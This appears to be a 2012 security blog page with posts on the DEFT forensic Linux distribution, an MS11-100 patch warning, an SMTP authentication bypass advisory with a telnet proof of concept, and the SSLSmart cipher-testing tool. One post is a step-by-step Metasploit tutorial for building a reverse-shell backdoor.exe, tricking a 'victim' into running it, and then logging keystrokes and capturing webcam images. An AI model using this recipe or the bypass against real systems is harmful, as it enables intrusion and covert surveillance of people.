Friday, January 13, 2012

DEFT Linux 7 Computer Forensic Live Cd - Released

DEFT (Digital Evidence & Forensic Toolkit) is a customised distribution of the Lubuntu live Linux CD. It is an easy-to-use system that includes excellent hardware detection and some of the best open-source applications dedicated to incident response and computer forensics.   

New features:

- Based on Lubuntu 11.10
- Installable Distro
- Linux kernel 3.0.0-12, USB 3 ready
- Libewf 20100226
- Afflib 3.6.14
- TSK 3.2.3
- Autopsy 2.24
- Digital Forensic Framework 1.2
- PTK Forensic 1.0.5 DEFT edition
- Maltego CE
- KeepNote 0.7.6
- Xplico 0.7.1
- Scalpel 2
- Hunchbackeed Foremost 0.6
- Findwild 1.3
- Bulk Extractor 1.1
- Emule Forensic 1.0
- Guymager 0.6.3-1
- Dhash 2
- Cyclone wizard acquire tool
- SQLite Database Browser 2.0b1
- BitPim 1.0.7
- Bbwhatsapp database converter
- Creepy 0.1.9
- Hydra 7.1
- Log2timeline 0.60
 - Wine 1.3.28 


Thursday, January 12, 2012

Hack Windows 7 with Metasploit

In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:

msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe

I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is

After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 4444

If all goes well, you should be able to establish a meterpreter session. Type sysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
it,s cool to take a screenshot with meterpreter command screenshot.
Adnan Anjum.

Monday, January 9, 2012

MS11-100 DoS PoC exploit published

If you have not patched yet for vulnerability MS11-100 you might want to do it ASAP, because the DoS PoC exploit for this vulnerability has been published three days ago.

More information about the vulnerability and patches at

Simple Mail Server - SMTP Authentication Bypass Vulnerability

Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability

Software : Simple Mail Server

Software Version : 2011-12-30


Class:  Origin Validation Error  


Remote:  Yes  

Local:  No  

Published:  2012-01-08


CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)

Impact : Medium (4 < 6.4 < 8)

Bug Description :
Simple Mail Server is a tiny Mail Server written in C#. It can be sent mail without password by using usual tcp 
client(such as telnet).
And it did not have SMTP authentication contoller.

POC(Remarks: domain and user alex () alex com must be exists in configuration for this test case):
telnet 25
220 TEST-121F797342 SMTP ready.
EHLO mail_of_alert
500 Not supported. Use HELO
250 OK
250 OK
354 Start mail input; end with .
From: "alex () alex com"
To: "alex () alex com"
Subject: authenticate is not required!

Friday, January 6, 2012

Perform Smart SSL Cipher Enumeration:SSL Smart

SSLSmart, a highly flexible and interactive tool aimed at improving efficiency and reducing the false positives during SSL testing.
Among other things, SSLSmart simply an advanced and highly flexible Ruby based smart SSL cipher enumeration tool. It is an open source, cross platform, free tool. It was programmed because a number of tools on the Windows platform allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed by initiating an SSL socket connection with one cipher suite at a time, an inefficient approach that leads to false positives and often does not provide a clear picture of the true vulnerability of the server. SSLSmart is designed to combat these shortcomings.

SSLSmart Features:

SSLSmart offers a wide range of features to improve testing efficiency and reduce false positives. These features are as follows:

  • Content Scan (default): Exact server response can be seen in HTML and Text forms for each
  • cipher suite selected for the test URL. Basically, it shows various server error messages received for weak cipher suites from live systems.
  • CONNECT Scan: Focuses only on success or failure of SSL socket connection with various cipher suites. This behavior does not offer any advantage over existing SSL testing tools and is thus likely to have similar issues with false positives. However, this scan is faster and consumes fewer network and CPU resources.
  • Dynamic Cipher Suite Support: Most SSL testing tools provide a fixed set of cipher suites. SSLSmart hooks into Ruby OpenSSL bindings and offers dynamic “on the fly” cipher suite generation capabilities.
  • Certificate Verification: SSLSmart performs server certificate verification. It uses the Firefox Root CA Certificate4 repository to perform Root CA verification. Additional Root CA Certificates can be added to the rootcerts.pem file or a custom .pem file can be supplied for Root CA Certificate verification.
  • Proxy Support: SSLSmart provides web proxy support. For results to be accurate, it is important to use a transparent proxy5.
  • Reporting: Reports can be generated in XML, HTML and Text formats along with their verbose versions. Verbose report versions include complete application response for each cipher suite and full details of the server certificate.
  • API’s: Monkey patched Ruby API’s that form the backbone of SSLSmart can be consumed to write custom Ruby scripts for quick tests. These API’s can be consumed by users who work with the SSLSmart gem.

What i liked the most about this tool is that SSLSmart supports XML, HTML, Text and their corresponding verbose reporting versions. In addition to details in the normal report, verbose versions include complete application responses for each cipher suite and full details of server certificates. Another feature that i liked is the API support. These API’s form the backbone for SSLSmart tests can be used to write custom scripts. SSLSmart gem includes source code and can be used by users who have Ruby installed on their systems and it comes from McAfee labs!

Platform Support and Installers:

SSLSmart has been tested to work on the following platforms and versions of Ruby:
Windows: Ruby 1.8.6 with wxruby6 (2.0.0) and builder7 (2.1.2).
Linux: Ruby 1.8.7/1.9.1 with wxruby (2.0.0) and builder (2.1.2).

Download SSLSmart:

SSLSmart 1.0 – –